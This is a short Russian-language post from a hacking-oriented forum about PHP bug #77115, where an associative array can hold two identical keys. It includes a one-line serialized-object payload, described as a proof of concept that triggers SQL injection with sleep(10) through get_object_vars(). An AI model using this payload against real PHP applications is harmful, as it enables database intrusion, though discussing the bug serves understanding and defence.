• XSS.stack #1 – первый литературный журнал от юзеров форума

shophp (PHP bug #77115)

top

(L3) cache
Пользователь
Регистрация
03.02.2020
Сообщения
252
Реакции
342
Оказалось, что в PHP может быть ситуация, когда у ассоциативного массива есть два абсолютно одинаковых ключа, каждый из которых имеет по одному уникальному строковому значению.

Примерно вот так:
PHP:
array(2) {
  ["foo"]=>
  string(4) "fooB"
  ["foo"]=>
  string(4) "fooA"
}
Подробности тут:

Если коротко, вот обфусцированный payload, который вызывает SQL инъекцию вот PoC, sleep(10) :
Код:
O:4:"Cart":2:{s:2:"id";s:2:"33";s:10:"\x00Entity\x00id";s:2:"11";} -> get_object_vars()
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх